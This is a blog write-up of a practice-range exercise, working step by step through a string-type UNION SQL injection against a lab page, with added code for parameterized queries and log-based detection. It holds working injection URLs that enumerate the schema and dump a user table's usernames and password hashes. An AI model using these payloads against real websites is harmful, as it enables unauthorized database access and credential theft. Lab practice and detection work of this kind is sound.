Notes on string-type SQL injection - Nanhack practice range (男黑客靶场)

Nanhack practice range: http://www.nanhack.com

Guessing the column count

Entering the following returns a result:
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8--+
Entering the following returns no result:
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8,9--+

So the column count is 8 (a UNION only succeeds when both SELECTs return the same number of columns; with 9 the query errors and the page shows nothing).


Finding the injection point (which columns are echoed)

Input:

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,2,3,4,5,6,7,8 --+

Result (the page echoes the executed query, then its 用户名 (username) and 邮箱 (email) fields):

select * from admins where id='-2' UNION SELECT 1,2,3,4,5,6,7,8 -- '
-----------------------------
用户名: 2
邮箱:4

Injection points found: the values of columns 2 and 4 are echoed back (as username and email).
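The echoed query above (select * from admins where id='-2' UNION SELECT ...) shows the root cause: the id value is concatenated into the SQL text, so the closing quote, UNION and comment become part of the statement. The following is an added example, not code from the post or from the Nanhack range. It rebuilds the same shape in SQLite with a constructed 8-column admins table (the column names and the one row are made up), runs the page's 8-column and 9-column probes through a concatenated query, and then runs the same input through a parameterized query, where the whole string is treated as data. The --+ from the URLs is written as "-- " here, which is what it decodes to.

```python
import sqlite3

# Constructed toy schema for this demo: an 8-column "admins" table, matching the
# column count the page derives. Column names and the row are made up.
SCHEMA = """
CREATE TABLE admins (
    id INTEGER, username TEXT, password TEXT, email TEXT,
    c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT
);
INSERT INTO admins VALUES (1, 'root', 'hash-placeholder', 'root@example.test', '', '', '', '');
"""


def make_db():
    """Return an in-memory SQLite connection loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation, the pattern behind the query echoed on the page.

    Returns the result rows, or None when the SQL fails to parse or execute.
    The real page hides the error, which is what appears as "no result"
    during the column-count step.
    """
    sql = "SELECT * FROM admins WHERE id='" + user_id + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None


def lookup_parameterized(conn, user_id):
    """The same lookup with a bound parameter: the input is data, never SQL text."""
    return conn.execute("SELECT * FROM admins WHERE id=?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe8 = "-2' UNION SELECT 1,2,3,4,5,6,7,8-- "
    probe9 = "-2' UNION SELECT 1,2,3,4,5,6,7,8,9-- "
    # Markers 1..8 come back as a row, so positions 2 and 4 would be echoed as username/email.
    print(lookup_vulnerable(db, probe8))
    # None: the column counts differ, SQLite raises, the app would show nothing.
    print(lookup_vulnerable(db, probe9))
    # []: with a bound parameter the entire string is compared against id and matches no row.
    print(lookup_parameterized(db, probe8))
```

The fix is the second function: a prepared statement with a bound parameter keeps the quote, UNION and comment inside the value, so the statement structure cannot change regardless of what the client sends.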


Dumping the database name and version

Input:

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,version(),5,6,7,8--+

Result:

select * from admins where id='-2' UNION SELECT 1,database(),3,version(),5,6,7,8-- '
-----------------------------
用户名: nanhack
邮箱:5.5.58

Dumping the table names

Input:

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()--+

Result:

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(table_name),5,6,7,8 from information_schema.tables where table_schema=database()-- '
-----------------------------
用户名: nanhack
邮箱:admin_logs,admins,class,facebook,kaiban,message,news,user

Dumping the columns of the user table

Input:

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database() and table_name='user'--+

or:
http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='user'--+

Result:

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database() and table_name='user'-- '
-----------------------------
用户名: nanhack
邮箱:id,username,password

Dumping the data in the user table

Input:

http://www.nanhack.com/payload/sql/char.php?id=-2' UNION SELECT 1,database(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user--+

Result:

select * from admins where id='-2' UNION SELECT 1,database(),3,group_concat(username,'@',password),5,6,7,8 from nanhack.user-- '
-----------------------------
用户名: nanhack
邮箱:admin@e10adc3949ba59abbe56e057f20f883e
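Every step of this chain goes through the id parameter of one GET request, so it leaves a clear trail in the web server's access log. The following is an added example, not part of the post: a small scanner that URL-decodes the request URI of each log line (repeatedly, so double encoding does not hide the quote) and flags the patterns the payloads above rely on: UNION ... SELECT, reads from information_schema, a quote followed by a comment marker, and the database()/version() fingerprint calls. The log lines are constructed to mirror the page's requests; the rule set is an illustration of the idea, not a complete signature list.

```python
import re
from urllib.parse import unquote_plus

# Each rule is checked against the decoded request URI (case-insensitive).
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "quote_then_comment": re.compile(r"'.*?(?:--|#)", re.I),
    "db_fingerprint": re.compile(r"\b(?:database|version)\(\)", re.I),
}

# Constructed access-log lines in common log format, modelled on the requests in the post.
LOGS = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /payload/sql/char.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2021:10:00:05 +0000] "GET /payload/sql/char.php?id=-2%27%20UNION%20SELECT%201,2,3,4,5,6,7,8--+ HTTP/1.1" 200 498',
    '203.0.113.5 - - [01/Jan/2021:10:00:09 +0000] "GET /payload/sql/char.php?id=-2%27%20UNION%20SELECT%201,database(),3,version(),5,6,7,8--+ HTTP/1.1" 200 501',
    '203.0.113.5 - - [01/Jan/2021:10:00:20 +0000] "GET /payload/sql/char.php?id=-2%27%20UNION%20SELECT%201,database(),3,group_concat(table_name),5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database()--+ HTTP/1.1" 200 540',
    '198.51.100.9 - - [01/Jan/2021:10:01:00 +0000] "GET /news.php?id=7&page=2 HTTP/1.1" 200 2048',
]


def decode_uri(uri):
    """URL-decode until the string stops changing, so %2527-style double encoding is unwrapped."""
    prev = None
    while prev != uri:
        prev, uri = uri, unquote_plus(uri)
    return uri


def request_uri(log_line):
    """Extract the request target from a common/combined log format line ("" if not found)."""
    m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)', log_line)
    return m.group(1) if m else ""


def classify(log_line):
    """Return the sorted list of rule names that match the decoded request URI."""
    uri = decode_uri(request_uri(log_line))
    return sorted(name for name, pat in RULES.items() if pat.search(uri))


def scan(lines):
    """Return (line index, matched rules) for every line that trips at least one rule."""
    hits = []
    for i, line in enumerate(lines):
        rules = classify(line)
        if rules:
            hits.append((i, rules))
    return hits


if __name__ == "__main__":
    for idx, rules in scan(LOGS):
        print(idx, rules)
```

Flagging on the decoded URI matters: the page's payloads arrive as %27 and --+ on the wire, and a rule that only looks at the raw line for a literal quote would miss all of them. Several rules firing from one client in a short window, as in the three flagged lines here, is the pattern worth alerting on.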
posted @ 2021-03-13 13:06  codeace